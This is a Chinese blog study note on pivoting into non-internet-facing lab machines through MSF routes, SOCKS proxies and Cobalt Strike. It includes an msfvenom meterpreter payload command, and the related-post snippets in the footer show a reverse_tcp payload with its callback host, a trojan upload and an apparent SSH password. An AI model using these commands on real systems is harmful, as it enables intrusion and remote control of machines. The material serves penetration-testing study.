第一百二十四天学习笔记-内网遨游-学习代理技术及CS/MSF上线不出网的机器

最新推荐文章于 2024-05-03 21:20:18 发布
最新推荐文章于 2024-05-03 21:20:18 发布
阅读量391 收藏
点赞数
文章标签: 学习 Powered by 金山文档
.
本文链接:https://blog.csdn.net/wuqingsix/article/details/129264612
版权

控制之前需要得到权限----网络通讯是正常的(忽略怎么拿到的权限)

四台主机 :

代理软件:sockscap proxifier前两个windos,ProxyChains(linux)

步骤:添加路由,创建节点,软件连接节点,在软件服务器进行后续渗透

MSF:

第一台:环境为 :本地有文件管理网站

本地只有一个网段出网 利用此网段 让 阿里云的msf服务器上线,在msf上使用了端口转发

同时在另外一台windows服务器上 使用了隧道代理工具连接到阿里云的msf服务器,相当于阿里云msf充当了跳板

操作:

1、添加路由

run autoroute -p

run post/multi/manage/autoroute

2、sock代理 全局应用

use expxxxx

set srvhost 0.0.0.0

set srvport 115

run

启动代理软件配置sock5代理

CS:

木马上传到有网的win7,然后让他通讯win10

操作:不需要添加路由,在cs客户端上可以一键添加(代理转发-socks代理)

代理工具使用 proxifier:

在代理工具上添加了 cs的阿里云服务端 -上线服务器

原理:攻击机(代理工具运行机)--代理到cs阿里云开放的口子上--cs阿里云服务端(开放了端口)----指定了win7----win10与win7同属一个内网,可以相互访问

Msf:正向连接

生成一个绑定了本地ip为127.0.0.1的木马,在win10上执行

msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=3333 -f exe > bd.exe

在msf(阿里云机)中设置payload 和rhost为192.168.11.129

win2008:

cs:在攻击机中使用proxifier代理目标主机指向阿里云主机(47.xxxx)

msf:添加路由地址--使得有22网段的

My Year 2019
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
安全-代理Socks协议&CS-MSF控制上线
m0_65336233的博客
12-19 1858
安全-代理Socks协议&路由不&后渗透通讯&CS-MSF控制上线
【内安全-CS】Cobalt Strike启动运行&上线方法&插件
12-19 9804
【内安全-CS】Cobalt Strike启动运行&上线方法&插件加载
安全-代理Socks协议&路由不&后渗透通讯&CS-MSF控制上线简单总结
最新发布
qq_43583125的博客
05-03 2265
我这里只记录原理,具体操作看文章后半段或者这篇文章注意这里是解决后渗透通讯问题,之后怎么提权,控制后面再说。
主机上线到CobaltStrike的方式
good good study
05-26 3540
当我们获取了一台边界服务器的权限,其一些内中的主机访问不了外时,我们如何让其上线cs?如下,win2012-1为边界服务器,其有一个内段192.168.10.x,同此段的还有两台服务器win7-1和win2012-2,但是这两台服务器访问不了外。假设我们能通过某种方式拿到他们的权限,但是我们又想把他们上线cs,该怎么办了?
3、内安全-代理Socks协议-路由不跳板通讯-CS/MSF线
m0_65842464的博客
01-02 492
用途:个人在线笔记,有所借鉴,欢迎指正背景:如下图,内中只有主机Windows7有外卡能,其余主机只有内卡,Windows7肯定能正常上线,但是其他主机上不了线,例如:Windows10,只能在192.168.11.0和192.168.22.0段通信。想法:让Windows7正常上线,然后利用其内卡建立和Windows10的路由,这样攻击机就可以和Windows10通讯,主机Windows7相当于传话人或跳板机,建立节点通信。
搭建CS服务器,并使自己虚拟机成功上线
Xiaolanzhende的博客
03-03 273
搭建CS服务器,并使自己虚拟机成功上线
机器学习个人笔记完整版v4.21(黄海广)
06-29
斯坦福大学经典的机器学习课程讲义, 黄海广个人笔记完整版。版本很新。
php-msf-docs:PHP微服务框架开发手册,即Micro Service Framework For PHP Develop Manual
04-29
PHP-MSF开发手册 PHP微服务框架开发手册,即...通过学习本手册,再结合我们的demo示例项目,就能够使用构建大规模高性能的微服务化分布式系统。 _______ ____ ________ / /_ ____ ____ ___ _____/ __/ ___/ __ \/ _
php-msf源码详解
10-18
主要介绍了php-msf源码的意思以及用法相关问题,有需要的朋友跟着参考学习下吧。
CVE-2019-0708RDP MSF攻击套件.rar
11-14
CVE-2019-0708RDP MSF攻击套件亲测可用,欢迎下载
通信与络中的MSF250的DS1/E1信号格式
12-10
MSF250是一种多业务成帧芯片,其主要功能在于处理通信络中的DS1/E1信号格式。DS1(T1)和E1(欧洲的T1版本)是数字语音和数据通信的标准,通常用于将多个较低速率的信号(如DS0,每个24kbps)复用成更高速率的链路...
【内安全】代理Socks协议&路由不&后渗透通讯&CS-MSF控制上线
今天是几号的博客
03-18 1478
先将msf代理流量转发至本地1234端口,然后使用代理工具连接该端口,进行流量转发。注意:实验之前查看靶机操作系统是否是64位,否则使用msf生成x84架构的木马。SocksCap Proxifier ProxyChains等。忽略细节,将msf_7777放置windows 7上,直接上线。#络通讯-MSF&CS-路由添加&节点建立。#控制上线-MSF&CS-协议生成&正反连接。监听器:bind_tcp port。操作:代理转发-Socks代理msf流量转发代理cs流量转发代理
第124天:内安全-代理技术&Socks协议&路由不&后渗透通讯&CS-MSF线
Karka_的博客
03-04 363
7的3333端口转发至其外口的4444端口,最后让控制器连接Win 7的4444端口即可。采用反向连接,配置reverse_tcp后门(绑定Win 7的3333端口)在Win 10运行,于是数据会交给Win 7的3333端口,再让Win。采用正向连接,配置bind_tcp后门(绑定本地2222端口)在Win 10运行,控制器使用MSFCS连接Win 10的2222端口即可。方法为:正向连接(适用于防火墙入站较松情况)、反向连接(适用于防火墙入站严格,方法稍复杂但也可以)④50份安全攻防面试指南。
【渗透测试】ew代理三层靶机穿透+proxifier配置规则
serendipity1130的博客
09-02 2718
1.远程连接: ssh yansiyu@10.177.228.176 W6WEwrqD 2.msf生成木马: cd /usr/share/metasploit-framework ./msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.177.228.128 LPORT=1234 -f elf > /home/load.elf 3.上传木马payload.elf文件到一层靶机: scp -p load.elf yansiyu@
安全-流量隧道(一)不CS线&正反向&端口转发
weixin_45701675的博客
04-16 3375
-隧道技术
cs学习使用4(代理
qq_45300786的博客
01-31 1889
自定义端口,ip的话就是服务端的ip,这样代理就创建好了 第一种代理就使用浏览器的sock4代理,ip就是服务端的,端口是是我们刚刚自定义的 第二种代理方式 把代码复制到metasploit控制台中,将metasploit中的流量引入到此socks代理 ...
反向代理服务器的工作原理
weixin_33850015的博客
11-19 174
为什么80%的码农都做不了架构师?>>> ...
Metasploit和Cobaltstrike上线机器
qq_40863723的博客
02-14 3985
多喝热水:http://hackergu.com 内中的很多机器是不可以的,那该如何在MsfCS中上线呢? MSF 我们的目标机器是一台linux服务器,我们先生成elf马。 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.101.90 LPORT=7777 -f elf >test.elf 在目标机器上使...
MSF线linux
03-18
MSF(Metasploit Framework)中,上线Linux主机是指通过漏洞利用或其他方式成功获取对目标Linux系统的控制权限。下面是一种常见的上线Linux主机的方法: 1. 扫描目标:使用MSF中的扫描模块,如nmap或auxiliary/...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值